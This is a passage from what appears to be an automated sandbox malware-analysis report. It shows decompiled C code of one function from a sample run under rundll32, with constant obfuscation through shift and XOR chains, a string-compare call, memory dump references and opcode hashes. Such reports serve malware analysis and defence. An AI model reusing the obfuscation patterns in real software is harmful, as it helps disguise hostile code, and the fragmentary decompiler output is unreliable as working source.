                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                        • Instruction ID: b9ee1325d8b3128547dcce02e2be54f80787113d3f29d3b78e80a4cf62f75a80
                                                                                                        • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                        • Instruction Fuzzy Hash: 211100B1C4030DEBDB54DFE5D94AA9EBBB0EB00748F108588D521B6240D3B89A489F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 86 2e8061d-2e806eb call 2e7fe29 call 2e6eb52 lstrcmpiW
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E02E8061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t44;
                                                                                                        				int _t53;
                                                                                                        				WCHAR* _t56;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_t56 = __edx;
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				_push(__ecx);
                                                                                                        				E02E7FE29(_t44);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v28 = 0xcd60b7;
                                                                                                        				_v12 = 0x7257ab;
                                                                                                        				_v12 = _v12 << 0xd;
                                                                                                        				_v12 = _v12 + 0x8f69;
                                                                                                        				_v12 = _v12 * 0x4c;
                                                                                                        				_v12 = _v12 ^ 0x410f7a13;
                                                                                                        				_v8 = 0x7b4696;
                                                                                                        				_v8 = _v8 + 0xffff4950;
                                                                                                        				_v8 = _v8 | 0x2a0f624b;
                                                                                                        				_v8 = _v8 * 0x3a;
                                                                                                        				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                        				_v20 = 0x8a2161;
                                                                                                        				_v20 = _v20 + 0xffff45ea;
                                                                                                        				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                        				_v20 = _v20 ^ 0x1be8dede;
                                                                                                        				_v16 = 0xdcc12a;
                                                                                                        				_v16 = _v16 + 0xb9f4;
                                                                                                        				_v16 = _v16 + 0xffffcfef;
                                                                                                        				_v16 = _v16 ^ 0x00d9de04;
                                                                                                        				E02E6EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                        				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                        				return _t53;
                                                                                                        			}












                                                                                                        0x02e80624
                                                                                                        0x02e80627
                                                                                                        0x02e80629
                                                                                                        0x02e8062c
                                                                                                        0x02e8062f
                                                                                                        0x02e80630
                                                                                                        0x02e80631
                                                                                                        0x02e80636
                                                                                                        0x02e8063d
                                                                                                        0x02e80644
                                                                                                        0x02e8064b
                                                                                                        0x02e8064f
                                                                                                        0x02e80667
                                                                                                        0x02e8066a
                                                                                                        0x02e80671
                                                                                                        0x02e80678
                                                                                                        0x02e8067f
                                                                                                        0x02e8068b
                                                                                                        0x02e8068e
                                                                                                        0x02e80695
                                                                                                        0x02e8069c
                                                                                                        0x02e806a3
                                                                                                        0x02e806aa
                                                                                                        0x02e806b1
                                                                                                        0x02e806b8
                                                                                                        0x02e806bf
                                                                                                        0x02e806c6
                                                                                                        0x02e806d9
                                                                                                        0x02e806e5
                                                                                                        0x02e806eb

                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02E806E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.312633523.0000000002E61000.00000020.00000001.sdmp, Offset: 02E60000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.312626227.0000000002E60000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000009.00000002.312674149.0000000002E86000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_2e60000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                        • Instruction ID: 86b8ce56682baacabdfa2d3110a1fe4872cf4791e8014066b03fbabb43679394
                                                                                                        • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                        • Instruction Fuzzy Hash: 172110B1C0130AABCF14DFA9D9899DEBFB5FB20354F108298E529A7251D3B48B04CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions